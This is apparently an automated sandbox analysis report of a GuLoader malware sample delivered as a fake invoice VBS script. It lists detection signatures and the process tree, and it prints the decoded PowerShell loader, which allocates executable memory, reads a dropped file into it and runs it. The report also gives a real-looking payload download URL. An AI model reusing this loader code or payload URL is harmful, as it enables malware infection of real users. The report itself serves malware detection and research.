Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WWVN_INVOICE_8363567453.vbs

Overview

General Information

Sample Name:WWVN_INVOICE_8363567453.vbs
Analysis ID:623396
MD5:9f8e253fd51c33a2f874942ebc0d3795
SHA1:6868a9005489e56542cf0df063985132fef50f3d
SHA256:c33e4e9bf305cec123840dd87aa84c6d71e68ac82ea039418e1b8be3ed791b37
Infos:

Detection

GuLoader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
C2 URLs / IPs found in malware configuration
Potential malicious VBS script found (has network functionality)
Encrypted powershell cmdline option found
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges

Classification

  • System is w10x64
  • wscript.exe (PID: 5560 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 6876 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "# N a n d i n m e 5   B o b l e k a   A r t i k u l e r   h o t m   F o r m n i n 4   V i g e s i m o k i 6   s t o m   E c h i n i t 6   p r o n a t i v   P y r o   T e x t t v 7   E l e v a t o r f r   R A M R O D S A   Q e k u r s u s s   b e a n p o   S k r k 2   p o l a r i   m e d e o l a   L o r a   R a p h i 6    
 # d e f a   p i e d   T a n d k d s b e   U n i m m o r   B a d g e r b 6   e x c l u s   C h o n d r o g 8   A E R O L O   F I S H E R M A N I   F A G I N T E G R   I n c e p t o 3   S n u r l 6   B i s e x u a   d o s s e r   g a v e l   m e t a f o r e   t r a n   a t a k   S e i s m i 2   N o n f a b u l   D i g t e k 3   R E G N S K A   P h y t o m e 9   M u r a e   H a l v 8   V O C I F E R A T E   W O O D C R A F T   h a r d h e a r t   K n i b   s e j t    
 # I m m e r v k 8   S p r o g f l   R E D S H I   s i f f l e u s   S u p e r   r i f t e r s   G r o u c h   P r o e v e t i   P R O T E N S I   L y d b i l l e d e   S U B E L E C T R   R a m m e t c h o r   C I S S E S A R   B r e d   j o r d f s t e   A n t i s e n s   L O X O    
 # S p l u r g y p y 7   S e p t e n   D i m s   T e b r e v s u n c 2   S t t t e p 2   l i k v i d e   A f t v i   p a n t o g   v e j b y g   c o c o   I S B R Y   P A S S   P i n f   m u n i k a t   u n s e   G U L D R   M e l o d i o u   p a n i m e t e   R a f t e s o s t e   a v a n c e m e n t   E n t e a s u b p r   M Y C E   T i d l n n e d e 3   o d y s s e n   d r y p t r r e n   p e r s o    
 # h o r n   C e n t r 4   H e n r y k k e s l 8   F O R D A M P N I N   I n t r a f o l   C a l d r o n   i n f r   v a l g   S I S Y R I   G e n o a k o   s k a d e g r e r   U n d e r a f s n i 2   V a c c i n a t   d r i l l e r i e r   C H A I    
 # D e t o x i f   a f m a l i   H m m e t n   A l k o h o l t y p 9   l i n i e   T A A R N   m e r o   S p e c t r o 8   s t j e r n   P o s i t i o   A u t o b i o   u t a k n e   H u m a n h o o 3   o m p l   B e v i s f r e l s 3   B r i l l e f o d e 6   E J E N D O M S   T u r i s t k 4   c h a n t a n t   b o n d e s t a   B I L F R A G T E R   S I D H E P R E    
 # S k i d e n t   a a n d e r f i a u   T a l l w o o 5   v i n o l o g i s t   L O Y A L E   V a l e r i 4   l a v i n   B a a r 9   f o r v e n t e l   N o n c o n v    
 # P E R S O N N A V   i d e m p   s t a r t   c h o y a i n t i   l o x i c t   H e s t e b r e 1   F o e l e b a l   M o i s   L a l l e t   O b e l i s k 3   d r i k k   L a n a s r    
 # b e s t r a a l i n   S T R M P E H   V E D L   M y e l o   D i s h   A c c e p t 1   U n p l 3   A R B E J D S L S H   A n m e l d e l s e   S K O V H Y T T E   p r s t e s k a b   P u b l i c i s 8   U m i n d e l 4    
 # s p o r t s m a   D k n i n g s s 4   D e p o s i 1   r e g n i n g s f u   s u s p e   D e b a   r e q u i r   S a l t s t e n m 1   R D E P A N G I    
 # S e l v m o d s i g   S U B D   k v k s f i n g e   A n o m   t h a i l n d e   O n d u   n o n p   W I N D B   a t o m v a a b n e   C h i e   s u b c h o r o i   S T U P H E F O K   I m b r u e m   E r n r i n g s f y   D r o o p s b 1   p r a i s e f u l n   I N G E N   O v e r   H o d s   O v e r h a u l e 8   w o o d s   u r e t h r o   L o k a l k    
 # R U N G L E S S K   V e r d   c y c l o d   a f d k n i n g   b u s l   A t t u n i n g   S a n i t i s i   P h o t o s   B o r e p l a t f   M a j o r   J U M B L E   W H E E L I N   L e e p i t d r 6   U N U S E D   M A G N   A g r a f 1   A m b e r n 4   A n d e n k l a 8   J a g g e d n   s o l i d a t i n g   A n g i v e   B R E V V   M I S T A N K E R    
 # P a l e i c h t h y 6   C l o w n e r i   t r i v s e l s p   P a m e 6   T i g h t w i   U n w i l 8   P e r i 4   P r o d u k   D a g c e n t r   G R A N U L A   S j u s s e n s r o 5   I S C H I A C B E   L e e f 7    
 # T r e m o u r i n t 5   S J U S K E M A L   D j e l l   M i l i t r l 9   G l o s s a n   R E V I E W S D   R E E L P E D A N T   H u s h o l d e   A L I E N A   D o b b e l t f u n   T e a t   H i n d e r e   S k y d 7   m y g g e s   L y n l a a s h   P a a t r   F a b r i k s 9    
 # P A A T E G N E R   D e t a l j e r e r   t i g g e r s k e   F i l e s   r e t s o p g r   P L U R   J u g e n d m n s t   U d b u 5   H e a v y h   m i l i   m e l o d   a f l a d n i n    
 # a f t v   a a n d e v e   b r o d y a g a s   t e l e o c e r a s   O C T A V O K   Z a r z u 3   I N D S   T W I S C   S K O V S L O   T o w n l a n d l y    
 # P R I S   G r u s v e j e 9   U n m a r b l e i z   A L K O H O L   D E V I A T I O N   H o m a t o   C r e a t i   S t o b s b 7   a n f l j e n   F o r e t a g e n   P r o t   U P L E A P E D   d i m p l e m e   g e r t h a s h a   S T O R K E N B B    
 # A s s u r a b l   M e t a f o r e r n   I H U K O M P   X y l o c 8   S t a n d a r   H a n d l i n g s l   P e w f u l b l o 2   M i s t n 3   O Y S T E R   D e t a i l p r   r e f o r   R I G S R E V I   c l o f i b   K N I C   B r n e l o k k   D e m o n t e r 8   t a r v   s l g e r s t   U N D E R    
 # S a n s e v e 9   I r r e s p   B I R C H E   M e g a   D a g l n s s a 2   K Y S T   S t o m a t o l o   A t t y   r u t i n e s s   p i c a m a r   l a c c i c h e   B Y G G E M Y N   g r i m a s   i n t r u   m a r q   j a r d o n n   c h o l o s   M O R B I   S A V A G E S S   R I D E H E S T E S   S t e m m e r e t s 5   r e v i   B a s t i l l 8   B e d a   S C U R R I E   U M E D G R   K y l i n   u n f i   s l i p   P R E H E N S    
 # A n d e n k l a s s   d e m a   S C I L L A E R   b l r e h a   R o n i n g 8   C U E M A N S H I   K a s e r n   R u f g a r d i n   p r a n g e n   U S P E C I F I   S u b l i m   K E R N E O P   A r i d   b r n e f d    
 # K a f f e g   B o o n d o g g l e   N o s t   R i f l e t t o r 7   S U R G E L E S S   I d r t s h j s k 2   r e s e r v a t i o   k i s s e   g a y l u s s i t   a t o m a f f a l d   R A G E O U S   B u t i k s d r i   o p d a t e   H o r n b r i 4   C o n s a n 7   M L K E K   I o d i d p h i l 6   I d e a l i s m e 4   F l a g e   I n v o l v e r s 4   u l n a a n i   R k e n u n   l i m e l i   a a r r i   m a d d o x u d v   H e l h e s t e n a   P o s t u l e r 1   B e z e l s c   B l i n    
 # C a s t e r 6   v a n d   c h a e n o   S q u a t t 5   H I G H L   C o n c h a e   P a r t   D E K L   s u b s i d e   u n d e   f a u n e r a   s p r e a   P A C I F I C A   F J E N D T L I   c e p h a l o t h o   S E R R A T I O   S e r b i s k e l 8    
 # F L L E S A N   A r a g o r n u n a   e n s r e t t e d e   M y e l   s u p e r s e x e   A g g r a v e r e   t i m e l o f   s i m e o n b e v i   P R E O P E N I N   s m e l t e   j e l l y f i s h a   G e r r a   P o i t r a i l o    
 # X e n o g l o s   O u t n   r e v i s o r f   V A A B E N F A   R u m s k i b e r 1   A t t e s t e 9   H a a n d h v e l s 8   D I P L O M   S I L E N A L   O a k y s l j d 4   L a t e n s   m f g g r u n   k a r t o t e k s o    
 # e s t o   T a l m   T u a r e g 2   B l o k f u n k t i 1   F o r l a   T r a n 1   A r b e j d   N o n c o   s i g t e m e l s o   G a l v a n i   F o d e r f a   R e s e c t 5    
 # E t a p e l b e t   B a c k f i s c 8   M Y L D R E   M a l c 8   g a m m i c k u   E g m u n t v a   H K A S   U n i r o n i c 5   T i l b a g e s k   F I R E O G T Y V   S t e a d i e s t   R g t e n d e s 4   S k v a d r o n e   B r e i s l a k i    
 # V I R K S O M H   G u e r 8   M A N C H E   A c c o m m o d a t   S e m i v e r t i 7   N A I V   L o g o g   S P I D S G   g k a n t l   t u g r i k s p r   c h a m   S y s t e m b e 5   B R O N Z E F    
 # R u m p l e l a s   D A N S E M U S E   M E S O R R H   U N D I S C O V E   T i d t a g e r e r   T y p o s s t o 7   B R O K A D E R S R   M y o s o t   r i d i c u l o u   B u g t   s l a n t e   j o l l i e d a n t   O M D I R I G E R   D e t r o n i s   F a d d 3   D r i k k   K R A G E F U G   P S E U D O A M A   S Y D D   U N D E T R I M E   t a m l u n g s u   l e o n a r d o u   O p l r   g e m i n a t   F r u g t h 5   M E T A   V A N D L B   U N T H O   m i s r e f e r r e   K h a l 6   S u k r i n g e   v g t i g    
  
  
 A d d - T y p e   - T y p e D e f i n i t i o n   @ "  
 u s i n g   S y s t e m ;  
 u s i n g   S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s ;  
 p u b l i c   s t a t i c   c l a s s   c h o n d r o g a 1  
 {  
 [ D l l I m p o r t ( " g d i 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   E n u m F o n t s A ( s t r i n g   R u c t i o u , u i n t   M u s k i l y 7 , i n t   D e b i 7 , i n t   c h o n d r o g a 0 , i n t   F a r m a k , i n t   Q u i n q u e v e , i n t   S L G T ) ;  
 [ D l l I m p o r t ( " K E R N E L 3 2 " ,   E n t r y P o i n t = " C r e a t e F i l e A " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   V i a c ( [ M a r s h a l A s ( U n m a n a g e d T y p e . L P S t r ) ] s t r i n g   R u c t i o u , u i n t   M u s k i l y 7 , i n t   D e b i 7 , i n t   c h o n d r o g a 0 , i n t   F a r m a k , i n t   Q u i n q u e v e , i n t   S L G T ) ;  
 [ D l l I m p o r t ( " n t d l l " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   N t A l l o c a t e V i r t u a l M e m o r y ( i n t   c h o n d r o g a 6 , r e f   I n t 3 2   C l a t h r a 4 , i n t   V a r e d e k l a , r e f   I n t 3 2   c h o n d r o g a , i n t   O u t h o w l i n g 5 , i n t   c h o n d r o g a 7 ) ;  
 [ D l l I m p o r t ( " K E R N E L 3 2 " ,   E n t r y P o i n t = " R e a d F i l e " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   C D A C ( i n t   V a r e d e k l a 0 , u i n t   V a r e d e k l a 1 , I n t P t r   V a r e d e k l a 2 , r e f   I n t 3 2   V a r e d e k l a 3 , i n t   V a r e d e k l a 4 ) ;  
 [ D l l I m p o r t ( " U S E R 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   E n u m W i n d o w s ( I n t P t r   V a r e d e k l a 5 , i n t   V a r e d e k l a 6 ) ;  
  
 }  
 " @  
 # R e m o p 8   D R T R I N E T I N   R e t r e 4   T j e r r i l   U r s k o v s m r   E x i l i c m y s t 6   I l d s p y e n d e   B a k t   M E L I O R A   s r v e r i   A u g u r e r    
 $ c h o n d r o g a 2 = " $ e n v : t e m p "   +   " \ H e t e r o 3 . d a t "  
 # p o s t p   M o n o t o n e r e   S I G N I F   T i d s k r a   L E F T I   R E F O R M P L A N   K l a g 5   R o t a m a n   I n d i v   R o t t e f n g e   T e r r i t o r i 2   X Y L O C O P A P   g o g y d e   M i c r o b e p    
 $ c h o n d r o g a 3 = 0 ;  
 $ c h o n d r o g a 9 = 1 0 4 8 5 7 6 ;  
 $ c h o n d r o g a 8 = [ c h o n d r o g a 1 ] : : N t A l l o c a t e V i r t u a l M e m o r y ( - 1 , [ r e f ] $ c h o n d r o g a 3 , 0 , [ r e f ] $ c h o n d r o g a 9 , 1 2 2 8 8 , 6 4 )  
 # K A R T O   C h i l   e s p r i t i n s t   S H R I L L I N   B O P L S   C r y p t o   U k r l i g s t e 1   M e l o t r a   S U P P R E S I V E   C h e f   R o s e v i n e 5   B i l b r o e n s p   A r b e j 2   I n t e r c a m p   G E V A L T I   R U C H E R S T E N   D I S P R    
 $ c h o n d r o g a 4 = [ c h o n d r o g a 1 ] : : V i a c ( $ c h o n d r o g a 2 , 2 1 4 7 4 8 3 6 4 8 , 1 , 0 , 3 , 1 2 8 , 0 )  
 # d i f f e r e n   h a v e   M o b i l e t s g r 3   a r k f d e r   i n d k   K L O D R I A N E R   T A S K E K R A B B   S J U S S   w h e a t   H y p o p h y s   A f h o l d s h o t 3   T h y r o c o l   U D V U   b u f f   p o l y e t h   b r i s k e t u n t   T Y E T C O Q   C o m p a   A f t a l e p 6   s t i n k i   G E N N E M B O R   a f t e r p   A l i q u a n 1   a n t i m o n y g   F r a n t s   Z I T I   N A G L E T G   B L O T   B e s n a k k e 7   U N D T A   B r a s h l y i g    
 $ c h o n d r o g a 5 = 0 ;  
 # B o l i d e s s l a 5   L A N D S R   P r o s   T l l e s 8   O m k l a s s i f i 7   P e n t a c r o n k 4   H E P T A T   W a k e r   r e g i o   U g e s k r i 7   S l a r 4   F O R E L    
 [ c h o n d r o g a 1 ] : : C D A C ( $ c h o n d r o g a 4 , $ c h o n d r o g a 3 , 5 8 7 6 7 , [ r e f ] $ c h o n d r o g a 5 , 0 )  
 # B E S K   S t r e e t w a r d 7   L e j r u d s t y r 6   U n l a n g u   u n k i n d   H A K M   w r i g h t r y   B a g g a a r d e n 2   S u b c o n t r a 8   f l a v   G r a v s t e d 7   H i g h h a t b a   S h a h    
 [ c h o n d r o g a 1 ] : : E n u m W i n d o w s ( $ c h o n d r o g a 3 ,   0 )  
  
  MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4608 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 6348 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD70A.tmp" "c:\Users\user\AppData\Local\Temp\nmk1nqgs\CSCB6EACAC7C331481095CED6A2215A0F6.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
{"Payload URL": "http://barsam.com.au/bin_FCWtLoO90.bin"}
SourceRuleDescriptionAuthorStrings
00000010.00000002.763535179.0000000009970000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 00000010.00000002.763535179.0000000009970000.00000040.00000800.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://barsam.com.au/bin_FCWtLoO90.bin"}
    Source: WWVN_INVOICE_8363567453.vbsReversingLabs: Detection: 24%
    Source: Binary string: k7C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.pdb source: powershell.exe, 00000010.00000002.758423763.000000000554C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.758073857.000000000536C000.00000004.00000800.00020000.00000000.sdmp

    Networking

    barindex
    Source: Malware configuration extractorURLs: http://barsam.com.au/bin_FCWtLoO90.bin
    Source: Initial file: Than21.SaveToFile FileName, adSaveCreateOverWrite
    Source: powershell.exe, 00000010.00000002.756793102.0000000004FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000010.00000002.757728131.000000000525D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro

    System Summary

    barindex
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbgJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 16636
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 16636Jump to behavior
    Source: WWVN_INVOICE_8363567453.vbsInitial sample: Strings found which are bigger than 50
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_04F2E6B816_2_04F2E6B8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_07EF940816_2_07EF9408
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_07EF940816_2_07EF9408
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_07EF004016_2_07EF0040
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_07EF001F16_2_07EF001F
    Source: C:\Windows\System32\wscript.exeProcess Stats: CPU usage > 98%
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
    Source: WWVN_INVOICE_8363567453.vbsReversingLabs: Detection: 24%
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
